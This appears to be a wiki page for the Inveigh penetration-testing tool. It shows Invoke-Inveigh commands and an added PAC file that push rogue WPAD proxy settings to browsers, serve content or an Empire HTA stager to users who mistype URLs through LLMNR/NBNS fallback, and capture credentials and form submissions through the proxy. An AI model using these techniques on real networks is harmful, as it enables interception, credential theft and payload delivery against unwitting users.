Kevin Robertson edited this page Apr 5, 2017 · 2 revisions

Set Proxy Configuration Through WPAD

Inveigh can be configured to deliver wpad.dat files that point a target's web browser at an external proxy (not Inveigh itself). Once the proxy has been configured in the browser, it can be leveraged for man-in-the-middle attacks using tactics not covered in this wiki.

  • Relevant Parameters
    WPADDirectHosts
    WPADIP
    WPADPort
    WPADResponse

  • Example
    Invoke-Inveigh -ConsoleOutput Y -WPADIP 192.168.1.100 -WPADPort 8080 -WPADDirectHosts google.com

Inveigh delivering a wpad.dat file containing proxy server details
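The following is an added example and not Inveigh's own generated wpad.dat: a PAC file of the shape the -WPADIP, -WPADPort and -WPADDirectHosts switches above describe, using the proxy (192.168.1.100:8080) and direct host (google.com) from the example command line. The standard PAC helper functions are normally supplied by the browser, so minimal versions are included here so the file can be exercised in Node. The isPlainHostName branch is an assumption added for illustration (single-label names are sent direct, which is what leaves room for the LLMNR/NBNS fallback discussed in the next section); the exact checks Inveigh emits may differ.

```javascript
// Added example (not Inveigh's code): a wpad.dat / PAC file equivalent to
//   -WPADIP 192.168.1.100 -WPADPort 8080 -WPADDirectHosts google.com
// plus stand-ins for the PAC helpers a browser normally provides.

// --- PAC helper stand-ins (browser-provided in real use) ---------------------

// True for names with no dot, e.g. "intranet" or a mistyped "reddit".
function isPlainHostName(host) {
  return host.indexOf(".") === -1;
}

// True when host is domain itself or a subdomain of it. A leading dot on
// domain (".google.com", as in the PAC spec examples) is tolerated. This is
// deliberately stricter than a raw suffix match so "notgoogle.com" does not
// match "google.com".
function dnsDomainIs(host, domain) {
  const d = domain.replace(/^\./, "").toLowerCase();
  const h = host.toLowerCase();
  return h === d || h.endsWith("." + d);
}

// Shell-style glob match ("*" and "?") as used by PAC files.
function shExpMatch(str, shexp) {
  const escaped = shexp.replace(/[.+^${}()|[\]\\]/g, "\\$&");
  const re = new RegExp("^" + escaped.replace(/\*/g, ".*").replace(/\?/g, ".") + "$");
  return re.test(str);
}

// --- The PAC file proper -----------------------------------------------------

// Values taken from the page's example command line (assumed layout).
const PROXY = "192.168.1.100:8080";          // -WPADIP / -WPADPort
const DIRECT_HOSTS = ["google.com"];         // -WPADDirectHosts

function FindProxyForURL(url, host) {
  host = host.toLowerCase();

  // Assumption added here, not implied by the page: single-label names go
  // direct, so the browser still resolves them itself (DNS, then LLMNR/NBNS).
  if (isPlainHostName(host)) {
    return "DIRECT";
  }

  // Hosts listed in -WPADDirectHosts bypass the proxy.
  for (const d of DIRECT_HOSTS) {
    if (dnsDomainIs(host, d)) {
      return "DIRECT";
    }
  }

  // Everything else goes through the external proxy. The trailing DIRECT is
  // the failover the browser falls back to once the proxy resets the
  // connection, which is what the "Inveigh's Proxy" behaviour relies on.
  return "PROXY " + PROXY + "; DIRECT";
}

// Convenience wrapper: evaluate the PAC for a full URL.
function proxyFor(urlString) {
  const u = new URL(urlString);
  return FindProxyForURL(urlString, u.hostname);
}

// Sample lookups (constructed inputs).
for (const u of ["https://www.google.com/", "http://notgoogle.com/", "http://reddit/", "https://example.org/"]) {
  console.log(u, "->", proxyFor(u));
}
```

Note that the PAC string a browser fetches is just this function body; the helpers above exist only so the decision logic can be tested outside a browser.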

Mistyped URLs

If a target mistypes a URL and leaves off the top-level domain (e.g., http://redditcom, https://reddit), the name is a single label that DNS will not resolve, so name resolution falls back to LLMNR or NBNS. The result should be that the browser connects directly to Inveigh's HTTP/HTTPS listener. Inveigh can be set to deliver specific content for this scenario. This can include text or code (e.g., HTML, HTA) supplied on the command line, or files stored on disk.

  • Example
    Invoke-Inveigh -ConsoleOutput Y -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; url=https://www.youtube.com/watch?v=ys5SlF089nM'></head></html>"

  • Relevant Parameters
    HTTPContentType
    HTTPDefaultEXE
    HTTPDefaultFile
    HTTPDir
    HTTPResponse

Inveigh set to deliver an Empire 2.0 HTA stager

Internet Explorer displaying the HTA popup box after a mistyped URL

Inveigh's Proxy

Normally the proxy authentication capture resets the TCP connection as soon as Inveigh has captured credentials. This triggers the browser's WPAD failover and leaves it in a state where it requests websites directly. When set to deliver content to a browser, Inveigh instead sends a single response after the proxy authentication capture and then resets the connection. If a browser is configured to request an HTTP (not HTTPS) URL on launch, Inveigh's proxy should be able to load content into the browser at launch; an HTTPS URL is tunnelled through the proxy with CONNECT, so the proxy never gets to answer the page request itself.

  • Example
    Invoke-Inveigh -ConsoleOutput Y -Proxy -HTTPResponse "hello"

  • Relevant Parameters
    HTTPContentType
    HTTPDefaultEXE
    HTTPDefaultFile
    HTTPDir
    HTTPResponse
    Proxy

Inveigh set to deliver a simple form through the proxy

Chrome displaying the simple form

Using Get-Inveigh to retrieve the POST request submitted through the form